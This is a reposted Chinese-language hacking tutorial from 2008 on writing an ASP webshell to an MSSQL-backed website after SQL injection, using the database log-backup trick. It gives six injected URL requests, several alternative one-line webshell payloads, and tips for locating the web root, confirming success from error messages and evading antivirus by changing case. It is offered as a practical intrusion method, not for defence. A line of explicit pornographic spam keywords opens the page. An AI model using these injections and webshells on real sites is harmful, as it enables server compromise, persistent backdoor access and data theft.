欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

log備份的入侵技巧總結

互聯(lián)網   發(fā)布時間:2008-10-08 19:36:14   作者:佚名   我要評論
當SQL注入是得到DB權限時候,接下來可以做的工作很多,象找管理員密碼,后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大,所以是我作為對DB權限的第一種試探方法. 但是在LOG備份中,我們經常會
當SQL注入是得到DB權限時候,接下來可以做的工作很多,象找管理員密碼,后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大,所以是我作為對DB權限的第一種試探方法.

但是在LOG備份中,我們經常會遇到一些很讓我們頭痛的問題,那就是閉合的問題,我在這里做個總結,也
好讓我們對不能閉合的方法有一個全面的了解.

1.先介紹下LOG備份,這個相信大家都很熟悉了,我還是習慣在IE里直接提交,返回正常的頁面就說這一步的操作就成功了,如果沒有返回正常的頁面,我們就可以根據IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%Execute(request("go"))%%>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:xxxxxxasp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--

分為6步操作,最容易出錯的就是第4步的操作,經常返回沒有閉合的問題,下面就是一些我們可以將
values中的內容可以進行更換的方式,當我們的一種方式不行的話,就可以換另一種方式,當所有的方式
都換完了,沒有什么好說的,要么就放棄,要么就換另一種方式繼續(xù),想列目錄找數(shù)據庫下載,后臺.這
里就不多說了,可以提換的內容有:
a).<%%Execute(request("go"))%%>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%Execute(request("l"))%>
<%execute request("a")%>

2.LOG備份要注意的一些問題:
a).要注意你現(xiàn)在的機器是不是WEB主機,簡單的方法就是翻他的目錄,看有沒有IIS安裝的文件
b).當你確定你要找的確實是WEN主機時,就可以找他的站點目錄了,這個也很重要,是步驟5的操作,如果備份到一個錯誤的目錄,當然就沒有辦法訪問了
c).備份成功后,你就可以試著用客戶端去連接,這個地方也有人弄錯,現(xiàn)在用的字段是go,你的客戶端的
相關字段也為go
d).用ececute正常備份出來的是用錯誤提示的,當你的顯示500錯誤時,請你將的IE錯誤提示打開,當顯示
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'
類型不匹配: 'execute'
時候表示你已經成功了,連接吧!!
e).還有極端的時候你備份出來的一句話被殺(當你確定你確實是備份在WEB主機的對應目錄是),你可以將

上面的VALUES字段中的值做幾個大小寫轉換,一般是沒有問題的..

3.因為這篇文章用了很多前輩的東西,不敢說是原創(chuàng),只能算做是討論,我會將我所知道的東西在以后的
日子里一一更新上去..謝謝!!
4.感謝各位前輩提出這么一個好方法否則就不會有這篇文章了..


相關文章

最新評論